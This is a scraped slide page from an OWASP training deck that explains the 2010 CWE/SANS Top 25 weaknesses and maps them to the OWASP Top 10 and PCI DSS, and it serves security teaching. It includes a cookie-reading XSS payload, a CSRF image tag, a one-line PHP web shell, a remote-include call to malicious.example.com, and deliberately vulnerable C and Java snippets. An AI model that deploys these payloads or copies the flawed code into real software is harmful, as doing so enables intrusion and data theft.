820 likes | 1.6k Views
OWASP Education Computer based training. 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping. Keith Turpin The Boeing Company OWASP Secure Coding Practices Lead OWASP Global Projects Committee keith.turpin@owasp.org. Nishi Kumar IT Architect Specialist, FIS
E N D
OWASP Education Computer based training 2010 CWE/SANS Top 25 with OWASP Top 10 and PCI DSS V2 Mapping • Keith TurpinThe Boeing Company • OWASP Secure Coding Practices Lead • OWASP Global Projects Committee • keith.turpin@owasp.org Nishi Kumar IT Architect Specialist, FIS OWASP CBT Project Lead OWASP Global Industry Committee Nishi.Kumar@owasp.org
Objectives • Provide an overview of the 2010 CWE/SANS Top 25 • Discuss mapping relationships between CWE/SANS Top 25, OWASP Top 10 for 2010 and PCI DSS V2 • Understand the CWE/SANS Top 25 weaknesses and • how to remediate them
Organizations • MITRE - http://www.mitre.org/ The MITRE Corporation is a not-for-profit organization that manages several Federally Funded Research and Development Centers. Mitre currently runs various IT security projects including the Common Weakness Enumeration (CWE) and it is the official source for the CWE/SANS Top 25 Most Dangerous Software Errors. CWE Database - http://cwe.mitre.org/ • SANS - http://www.sans.org The SysAdmin, Audit, Network, Security (SANS) Institute operates as a commercial research and education company. SANS is well known for its Internet Storm Center, its comprehensive list computing security training programs and its work with Mitre on the CWE/SANS Top 25 Most Dangerous Software Errors.
Selection and Ranking • Builds on the original 2009 version • Methodology - Qualitative rather than quantitative • Factors in ranking - Prevalence and Severity • Initially started with 41 candidate weaknesses
Mapping Considerations • SANS CWE Top 25 is only a fraction of the full CWE list of weaknesses • SANS CWE Top 25 target both web and non-web applications • OWASP defines ten risks focused on web applications • OWASP's list tends to have broader weaknesses - made up of several specific vulnerabilities • PCI DSS Requirements point to both as industry best practices
[1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Try this in your browser: <script>javascript:alert(document.cookie)</script>
[1] CWE-79Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') E.g. outputencoding< becomes <, > becomes >& becomes & and " becomes " <script> -> <script> (markup)
[2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')
[2] CWE-89Improper Neutralization of Special Elements used in an SQL Command('SQL Injection')
[3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') • Example: C • char last_name[20];...................................Declare array with 20 character limit • printf ("Enter your last name: "); • scanf ("%s", last_name); ...........................Get input (no limit) and store in array • The software does not limit the size of the name entered by the user, so an entry of more than 20 characters will cause a buffer overflow, since the "last_name" array can only hold 20 characters
[3] CWE-120Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
[4] CWE-352Cross-Site Request Forgery (CSRF) • Example of a legitimate request: • http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 • Example or a forged request using a hidden image tag: • <imgsrc=http://example.com/app/transferFunds?amount=1500&destinationAccount= • attackersAcct# width="0" height="0" />
[6] CWE-807Reliance on Untrusted Inputs in a Security Decision
[6] CWE-807Reliance on Untrusted Inputs in a Security Decision
[7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[7] CWE-22Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
[8] CWE-434Unrestricted Upload of File with Dangerous Type Example: PHP <?php system($_GET['cmd']); ?>
[9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[9] CWE-78Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
[13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') Example: PHP $dir = $_GET['module_name']; include($dir . "/function.php"); Malicious call to a remote file: /victim.php?module_name=http://malicious.example.com
[13] CWE-98Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion')
[14] CWE-129Improper Validation of Array Index Example: Java public String getValue(int index) { return array[index]; } If index is outside of the range of the array, this may result in an ArrayIndexOutOfBounds Exception being raised
[15] CWE-754Improper Check for Unusual or Exceptional Condition Example: Java (Bad Code)Example Language: Java String itemName = request.getParameter(ITEM_NAME); if (itemName.compareTo(IMPORTANT_ITEM) == 0) { ... } The code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.
[15] CWE-754Improper Check for Unusual or Exceptional Condition
[16] CWE-209Information Exposure Through an Error Message • Example: Java • try { • /.../ • } catch (Exception e) { • System.out.println(e); • } • If this output is redirected to a web user, this may represent a security problem • In the following example, sensitive information might be printed depending on the exception that occurs. If an exception related to SQL is handled by the catch, then the output might contain sensitive information such as SQL query structure or private information.
[17] CWE-190Integer Overflow or Wraparound Example: C nresp = packet_get_int(); if (nresp > 0) { response = xmalloc(nresp*sizeof(char*)); for (i = 0; i > nresp; i++) response[i] = packet_get_string(NULL); } If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0, causing the subsequent loop iterations to overflow the heap buffer response
[18] CWE-131Incorrect Calculation of Buffer Size Example: C int *id_sequence; id_sequence = (int*) malloc(3); if (id_sequence == NULL) exit(1); id_sequence[0] = 13579; id_sequence[1] = 24680; id_sequence[2] = 97531; The size parameter used during the malloc() call is set to '3' which results in a buffer of 3 bytes. The intent was to create a buffer that holds three ints, and in C, each int requires 4 bytes, so an array of 12 bytes is needed. Executing the above code could result in a buffer overflow as 12 bytes of data is being saved into 3 bytes worth of allocated space
[20] CWE-494Download of Code Without Integrity Check Example: Java URL[] classURLs= new URL[]{ new URL("file:subdir/") }; URLClassLoader loader = new URLClassLoader(classURLs); Class loadedClass = Class.forName("loadMe", true, loader); This code does not ensure that the class loaded is the intended one, for example by verifying the class's checksum.